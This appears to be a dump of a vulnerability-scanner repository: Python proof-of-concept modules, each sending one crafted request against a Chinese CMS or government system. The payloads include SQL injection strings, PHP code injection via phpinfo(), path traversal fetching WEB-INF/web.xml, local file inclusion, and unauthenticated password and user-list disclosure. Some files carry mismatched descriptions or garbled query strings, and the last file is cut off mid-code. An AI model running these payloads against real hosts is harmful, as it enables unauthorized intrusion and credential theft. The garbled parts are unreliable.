5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0155657
6 | author: Lucifer
7 | description: 依友POS系统用户名列表泄露,且系统无验证码,可暴力破解登陆。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class yeu_disclosure_uid_BaseVerify:
    """Check whether SelFunOper.aspx lists operator accounts without a login.

    A response containing both OperID and OperName is taken as the operator
    list being disclosed. The module header adds that the login form has no
    CAPTCHA, so the page should require authentication and the login should
    be rate-limited.
    """

    def __init__(self, url):
        # Base URL of the site to check; the page path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when both column names appear."""
        vulnurl = self.url + "/Code/System/FunRepManage/SelFunOper.aspx?rid=0001"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            page = response.text
            if "OperID" in page and "OperName" in page:
                cprint("[+]存在依友POS系统登陆信息泄露漏洞...(中危)\tpayload: " + vulnurl, "yellow")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    yeu_disclosure_uid_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/zf_cms_FileDownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 某政府通用任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-068728
6 | author: Lucifer
7 | description: 文件/coupon/s.php中,参数fids存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
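class zf_cms_FileDownload_BaseVerify:
    """Check whether FileDownload.jsp serves /WEB-INF/web.xml through its filepath parameter.

    A hit means filepath is opened without being confined to the upload
    directory; the page should map download ids to stored files instead of
    accepting a path from the client.
    NOTE(review): the module header's description talks about a /coupon/s.php
    SQL injection, which does not match this probe.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    @staticmethod
    def _is_xml_media_type(content_type):
        """Return True when *content_type* names application/xml.

        Parameters such as "; charset=UTF-8" and letter case are ignored, and
        a missing header (None) is simply not a match.
        """
        media_type = (content_type or "").split(";", 1)[0].strip().lower()
        return media_type == "application/xml"

    def run(self):
        """Send one GET request and print a finding when an XML document comes back."""
        vulnurl = self.url + "/cms/upload/FileDownload.jsp?id=020010040000092515&filepath=/WEB-INF/web.xml&downloadName=web.xml"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            # .get(): a response without Content-Type used to raise KeyError,
            # which was then reported as a connection timeout.
            # The media type alone is weak evidence; any XML reply matches.
            if self._is_xml_media_type(response.headers.get("Content-Type")):
                cprint("[+]存在某政府通用任意文件下载漏洞...(高危)\tpayload: " + vulnurl, "red")
        except Exception:
            # Still best-effort, but Ctrl-C and SystemExit are no longer
            # swallowed and reported as a timeout.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")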
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    zf_cms_FileDownload_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/zfcgxt_UserSecurityController_getpass.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 某政府采购系统任意用户密码获取漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-076710
6 | author: Lucifer
7 | description: 未授权泄露了用户密码信息可直接登录。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class zfcgxt_UserSecurityController_getpass_BaseVerify:
    """Check whether UserSecurityController.do discloses account data without a login.

    The request calls method=getPassword, step 2, for userName=admin. A 200
    response containing both usrIsExpired and usrIsLocked is taken as the
    account record being returned; the endpoint should require an
    authenticated session and never return credential fields.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the account fields appear."""
        vulnurl = self.url + "/UserSecurityController.do?method=getPassword&step=2&userName=admin"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if response.status_code == 200:
                page = response.text
                if "usrIsExpired" in page and "usrIsLocked" in page:
                    cprint("[+]存在某政府采购系统任意用户密码获取漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    zfcgxt_UserSecurityController_getpass_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/zhuofan_downLoadFile_download.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 卓繁cms任意文件下载漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-54074
6 | author: Lucifer
7 | description: 文件/index/downLoadFile.action中,参数filePath存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
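class zhuofan_downLoadFile_download_BaseVerify:
    """Check whether /index/downLoadFile.action serves WEB-INF/web.xml via filePath.

    A hit means filePath is opened without being confined to the download
    directory; the action should resolve the path and reject anything outside
    its base directory.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    @staticmethod
    def _looks_like_web_xml(body):
        """Return True when *body* contains the root element of a deployment descriptor.

        The marker literal in this check was an empty string, which is
        contained in every response, so any reachable host was reported.
        "<web-app" is the root element of web.xml.
        NOTE(review): confirm the intended marker against the upstream file.
        """
        return "<web-app" in body

    def run(self):
        """Send one GET request and print a finding when web.xml content comes back."""
        vulnurl = self.url + "/index/downLoadFile.action?fileName=web.xml&filePath=WEB-INF/web.xml"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if self._looks_like_web_xml(response.text):
                cprint("[+]存在卓繁cms任意文件下载漏洞...(高危)\tpayload: " + vulnurl, "red")
        except Exception:
            # Still best-effort, but Ctrl-C and SystemExit are no longer
            # swallowed and reported as a timeout.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")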
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    zhuofan_downLoadFile_download_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/pageadmin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/pageadmin/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/php168/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/php168/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/phpcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/phpcms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/phpcms/phpcms_product_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms2008 product.php 代码执行
5 | referer: http://www.wooyun.org/bugs/WooYun-2011-02984
6 | author: Lucifer
7 | description: 文件product.php中,参数pagesize存在代码注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class phpcms_product_code_exec_BaseVerify:
    """Detect code injection in /yp/product.php via the pagesize parameter.

    The probe passes a phpinfo() expression as pagesize; the phpinfo heading
    "Configuration File (php.ini) Path" in the response means the value was
    evaluated as PHP. The fix is to treat pagesize strictly as an integer.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when phpinfo output appears."""
        vulnurl = self.url + "/yp/product.php?pagesize=${@phpinfo()}"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        phpinfo_heading = "Configuration File (php.ini) Path"
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if phpinfo_heading in response.text:
                cprint("[+]存在phpcms2008 product.php 代码执行漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    phpcms_product_code_exec_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/phpmyadmin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/phpmyadmin/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/phpok/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/phpok/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/phpok/phpok_api_param_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpok api.php SQL注入漏洞
5 | referer: http://www.moonsec.com/post-677.html
6 | author: Lucifer
7 | description: api_control文件存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class phpok_api_param_sqli_BaseVerify:
    """Detect SQL injection in phpok's api.php (api controller, f=phpok).

    The probe asks the database for MD5(1234) in a UNION; the digest showing
    up in the response means the request parameters are concatenated into the
    query. The fix is to cast or bind those parameters before use.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the digest is echoed."""
        # NOTE(review): the "¶" characters in the query string look like an
        # HTML-entity decoding artefact; compare with the upstream file before
        # relying on this check's result.
        vulnurl = self.url + "/api.php?c=api&f=phpok&id=_total¶m[pid]=42¶m[user_id]=0)UnIOn/**/sElEcT/**/mD5(1234)/**/LIMIT/**/1,1%23"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Hex MD5 digest of "1234", which the probe asks for.
        md5_of_1234 = "81dc9bdb52d04dc20036dbd8313ed055"
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if md5_of_1234 in response.text:
                cprint("[+]存在phpok api.php SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    phpok_api_param_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/phpstudy/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/phpstudy/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/phpstudy/phpstudy_probe.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpstudy探针
5 | referer: unknown
6 | author: Lucifer
7 | description: phpstudy默认存在探针l.php,泄露敏感信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class phpstudy_probe_BaseVerify:
    """Check whether the phpStudy probe page /l.php is still deployed.

    The module header notes that phpStudy ships this page by default and that
    it discloses environment details. A response containing both "phpStudy"
    and "php_version" is treated as the page being present; it should be
    removed from any host reachable by others.
    """

    def __init__(self, url):
        # Base URL of the site to check; the page path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the probe page is returned."""
        vulnurl = self.url + "/l.php"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            page = response.text
            if "phpStudy" in page and "php_version" in page:
                cprint("[+]存在phpstudy探针...(信息)\tpayload: " + vulnurl, "green")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    phpstudy_probe_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/piaoyou/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/piaoyou/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/piaoyou/piaoyou_int_order_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友票务系统int_order.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0127911
6 | author: Lucifer
7 | description: 文件tickets/int_order.aspx中,参数id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class piaoyou_int_order_sqli_BaseVerify:
    """Detect SQL injection in /tickets/int_order.aspx via the id parameter.

    The probe converts "BBB" + @@VERSION to INT; the marker "BBBMicrosoft" in
    the response (presumably inside the conversion error) means id reaches the
    SQL text. Fix: bind id as a parameter and do not return database errors to
    the client.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the marker is echoed."""
        vulnurl = self.url + "/tickets/int_order.aspx?id=1Or/**/1=CoNvErt(InT,ChAr(66)%2BChAr(66)%2BChAr(66)%2b@@VeRsIoN)--"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # CHAR(66) three times spells "BBB"; "Microsoft" is expected from @@VERSION.
        marker = "BBBMicrosoft"
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if marker in response.text:
                cprint("[+]存在票友票务系统int_order.aspx SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    piaoyou_int_order_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/pstar/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/pstar/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/pstar/pstar_isfLclInfo_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: PSTAR-电子服务平台SQL注入漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0128182
6 | author: Lucifer
7 | description: 文件/HyperLink/isfLclInfo.aspx?type=A&no=,no参数存在SQL注入漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class pstar_isfLclInfo_sqli_BaseVerify:
    """Detect SQL injection in /HyperLink/isfLclInfo.aspx via the no parameter.

    The probe compares a number with the hex MD5 of '1234'; the digest showing
    up in the response (presumably inside a conversion error) means no reaches
    the SQL text unescaped. The fix is a parameterised query.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the digest is echoed."""
        vulnurl = self.url + "/HyperLink/isfLclInfo.aspx?type=A&no=%27AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Hex MD5 digest of "1234", which the probe asks for.
        md5_of_1234 = "81dc9bdb52d04dc20036dbd8313ed055"
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if md5_of_1234 in response.text:
                cprint("[+]存在PSTAR-电子服务平台SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    pstar_isfLclInfo_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/pstar/pstar_qcustoms_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: PSTAR-电子服务平台SQL注入漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0128182
6 | author: Lucifer
7 | description: 文件/HyperLink/qcustoms.aspx,no参数存在SQL注入漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
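class pstar_qcustoms_sqli_BaseVerify:
    """Check one host for SQL injection in the `no` parameter of qcustoms.aspx.

    The probe makes the database compute the MD5 of "1234" and reports the
    host only when that digest appears in the response body. A hit means the
    `no` value reaches the SQL statement unescaped; the server-side fix is a
    parameterized query.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/HyperLink/qcustoms.aspx?type=A&no=%27AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # The marker is md5("1234"): present only if the injected
            # expression ran and its result was reflected.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in resp.text:
                cprint("[+]存在PSTAR-电子服务平台SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")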
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    pstar_qcustoms_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/pstar/pstar_warehouse_msg_01_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: PSTAR-电子服务平台SQL注入漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0146263
6 | author: Lucifer
7 | description: 文件/HyperLink/warehouse_msg_01.aspx?type=A&no=,no参数存在SQL注入漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
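class pstar_warehouse_msg_01_sqli_BaseVerify:
    """Check one host for SQL injection in `no` of warehouse_msg_01.aspx.

    The probe makes the database compute the MD5 of "1234" and reports the
    host only when that digest appears in the response body. A hit means the
    `no` value reaches the SQL statement unescaped; the server-side fix is a
    parameterized query.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/HyperLink/warehouse_msg_01.aspx?type=A&no=%27AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # The marker is md5("1234"): present only if the injected
            # expression ran and its result was reflected.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in resp.text:
                cprint("[+]存在PSTAR-电子服务平台SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")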
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    pstar_warehouse_msg_01_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/qibocms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/qibocms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/qibocms/qibocms_s_fids_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: qibocms s.php文件参数fids SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938
6 | author: Lucifer
7 | description: 文件/coupon/s.php中,参数fids存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
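class qibocms_s_fids_sqli_BaseVerify:
    """Check one host for SQL injection in the `fids[]` parameter of /coupon/s.php.

    The probe appends a UNION SELECT whose first column is MD5(1234) and
    reports the host only when that digest is echoed in the response body.
    A hit means `fids[]` is concatenated into the query; the server-side fix
    is to cast or bind the values.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/coupon/s.php?action=search&keyword=11&fid=1&fids[]=0)%20UnIoN%20SeLeCt%20Md5(1234),2,3,4,5,6,7,8,9%23"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # The marker is md5("1234"): present only if the injected SELECT
            # ran and its first column was rendered.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in resp.text:
                cprint("[+]存在qibocms s.php文件参数fids SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")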
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    qibocms_s_fids_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/ruvar/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/ruvar/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/seacms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/seacms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/seacms/seacms_search_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: seacms search.php 代码执行
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件search.php中,参数area存在代码执行。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
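class seacms_search_code_exec_BaseVerify:
    """Check one host for code execution through `area` in seacms search.php.

    The probe passes `phpinfo()` as the `area` value and reports the host
    when the phpinfo banner text appears in the response. The match is a
    plain substring test, so any page that happens to contain that phrase is
    reported as well.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/search.php?searchtype=5&tid=&area=phpinfo()"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # This phrase is a row label of the phpinfo() output page.
            if r"Configuration File (php.ini) Path" in resp.text:
                cprint("[+]存在seacms search.php代码注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")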
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    seacms_search_code_exec_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/shadowsit/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/shadowsit/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/shadowsit/shadowsit_selector_lfi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Shadows-IT selector.php 任意文件包含
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件selector.php中,参数idbase64解码可包含本地文件。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
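class shadowsit_selector_lfi_BaseVerify:
    """Check one host for local file inclusion via `id` in Shadows-IT selector.php.

    The `page`, `op` and `id` values are sent base64-encoded. The host is
    reported when the response body contains the literal `$DB_site`, i.e.
    when PHP source text is returned instead of rendered output.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/admin/selector.php?page=dXBsb2FkX2ZpbGU=&op=ZHJhd19jYXRfcGhvdG8=&id=Li4vLi4vaW5kZXgucGhw"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
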